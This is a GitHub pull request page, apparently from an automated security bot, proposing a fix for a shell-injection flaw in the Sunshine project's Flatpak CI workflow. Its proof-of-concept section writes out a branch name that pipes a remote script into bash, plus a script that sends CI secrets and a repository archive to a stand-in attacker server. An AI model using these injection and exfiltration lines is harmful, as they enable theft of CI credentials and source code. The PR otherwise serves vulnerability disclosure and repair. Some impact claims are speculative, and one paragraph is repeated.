Skip to content

Fix: Code Injection Risk in GitHub Actions Workflow Through Untrusted Input in .github/workflows/ci-flatpak.yml #4411

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
orbisai0security wants to merge 1 commit into from
Closed

Fix: Code Injection Risk in GitHub Actions Workflow Through Untrusted Input in .github/workflows/ci-flatpak.yml #4411

orbisai0security wants to merge 1 commit into from

Conversation

@orbisai0security
Copy link

@orbisai0security orbisai0security commented Nov 12, 2025

Context and Purpose:

This PR automatically remediates a security vulnerability:

  • Description: Using variable interpolation ${{...}} with github context data in a run: step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. github context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with env: to store the data and use the environment variable in the run: script. Be sure to use double-quotes the environment variable, like this: "$ENVVAR".
  • Rule ID: yaml.github-actions.security.run-shell-injection.run-shell-injection
  • Severity: HIGH
  • File: .github/workflows/ci-flatpak.yml
  • Lines Affected: 103 - 132

This change is necessary to protect the application from potential security risks associated with this vulnerability.

Security Impact Assessment:

Aspect Rating Rationale
Impact High In the Sunshine repository, which develops a game streaming server distributed via releases and packages, exploitation could allow code injection into the CI runner, potentially stealing GitHub secrets like API tokens or access keys used for publishing builds, and tampering with Flatpak package builds to inject malicious code into user-installable software, leading to widespread compromise of end-user systems.
Likelihood Medium The ci-flatpak.yml workflow likely runs on pull requests or pushes, where attackers could control github context data such as PR titles or branch names to inject code, but exploitation requires crafting specific inputs and the workflow's triggers, making it feasible yet not trivially easy without insider knowledge of the repo's CI setup.
Ease of Fix Easy Remediation involves modifying the workflow YAML to use an intermediate environment variable with env: for the github context data and referencing it in the run: step with double-quotes, requiring only a simple edit to the single file without impacting dependencies or necessitating extensive testing.

Evidence: Proof-of-Concept Exploitation Demo:

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited:

The vulnerability in .github/workflows/ci-flatpak.yml allows shell injection through the use of GitHub context variables (e.g., ${{ github.event.pull_request.head.ref }}) directly in run: steps, enabling an attacker to execute arbitrary commands on the CI runner. In this specific repository, which builds and tests the Sunshine game streaming server, an attacker could exploit this by submitting a pull request with a malicious branch name that injects shell commands, potentially stealing repository secrets, source code, or build artifacts. This is particularly concerning for a project handling user authentication and media streaming data, as it could lead to unauthorized access or data exfiltration during automated builds.

The vulnerability in .github/workflows/ci-flatpak.yml allows shell injection through the use of GitHub context variables (e.g., ${{ github.event.pull_request.head.ref }}) directly in run: steps, enabling an attacker to execute arbitrary commands on the CI runner. In this specific repository, which builds and tests the Sunshine game streaming server, an attacker could exploit this by submitting a pull request with a malicious branch name that injects shell commands, potentially stealing repository secrets, source code, or build artifacts. This is particularly concerning for a project handling user authentication and media streaming data, as it could lead to unauthorized access or data exfiltration during automated builds.

# Step 1: Attacker forks the repository (https://github.com/LizardByte/Sunshine)
# This is a prerequisite to create a pull request with controlled input.

# Step 2: Create a malicious branch name designed to inject shell commands
# Assuming the workflow uses something like ${{ github.event.pull_request.head.ref }} in a run step (e.g., to log or process the branch name),
# an attacker names the branch to break out of the command and execute arbitrary code.
# Example branch name: '; curl http://attacker-controlled-server.com/malicious.sh | bash; echo '

# Step 3: Submit a pull request from the forked repo to the main repository
# The PR triggers the CI workflow in ci-flatpak.yml, which runs on GitHub's infrastructure.
# If the workflow has a step like:
# run: echo "Building from branch ${{ github.event.pull_request.head.ref }}"
# This would execute: echo "Building from branch '; curl http://attacker-controlled-server.com/malicious.sh | bash; echo '"
# Leading to command injection.

# Step 4: The malicious.sh script could exfiltrate data, e.g.:
# On the attacker's server (malicious.sh):
#!/bin/bash
# Exfiltrate secrets and code
curl -d "$(env | grep -E '(GITHUB_TOKEN|AWS_|SECRET)' | base64)" http://attacker-server.com/exfil
# Clone and exfiltrate source code
git clone https://github.com/LizardByte/Sunshine.git /tmp/repo && tar czf /tmp/repo.tar.gz /tmp/repo && curl -F "file=@/tmp/repo.tar.gz" http://attacker-server.com/upload
# Install persistence or further compromise
# (e.g., add SSH key, install backdoor)

# Step 5: The injected commands run with the privileges of the CI runner (typically a GitHub-hosted Ubuntu container),
# allowing access to environment variables, temporary files, and potentially cached dependencies.

Exploitation Impact Assessment:

Impact Category Severity Description
Data Exposure High Exposure of GitHub secrets (e.g., API tokens for releases or integrations), build artifacts (compiled Sunshine binaries), and repository source code containing sensitive configurations like authentication keys or streaming protocols. An attacker could exfiltrate user data if the CI environment caches database dumps or test fixtures related to Sunshine's user management.
System Compromise Medium Limited to the CI runner's containerized environment (GitHub Actions Ubuntu runners), granting arbitrary code execution but not direct host access. Attacker could pivot to compromise other jobs in the workflow or exfiltrate credentials for broader access, but no root-level host escape is possible without additional vulnerabilities.
Operational Impact Medium Disruption of CI/CD pipelines, potentially delaying releases of Sunshine updates. If exploited repeatedly, it could exhaust build minutes or trigger rate limits, affecting development velocity. No direct impact on production Sunshine servers, but compromised builds could lead to tainted artifacts being deployed.
Compliance Risk High Violates GitHub's security best practices and OWASP guidelines for injection attacks, potentially breaching SOC2 controls for secure development pipelines. For a project handling media streaming (which may involve user-generated content), this could implicate GDPR if personal data is leaked during builds, and it fails CIS Benchmarks for CI/CD security hardening.

Solution Implemented:

The automated remediation process has applied the necessary changes to the affected code in .github/workflows/ci-flatpak.yml to resolve the identified issue.

Please review the changes to ensure they are correct and integrate as expected.

@orbisai0security
fix: semgrep_yaml.github-actions.security.run-shell-injection.run-she…
fc721ff 
…ll-injection_.github/workflows/ci-flatpak.yml_103
@sonarqubecloud
Copy link

sonarqubecloud bot commented Nov 12, 2025

Quality Gate Failed Quality Gate failed

Failed conditions
1 New issue
1 New Code Smells (required ≤ 0)

See analysis details on SonarQube Cloud

Catch issues before they fail your Quality Gate with our IDE extension SonarQube for IDE

@ReenigneArcher ReenigneArcher mentioned this pull request Nov 12, 2025
Merged
21 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@orbisai0security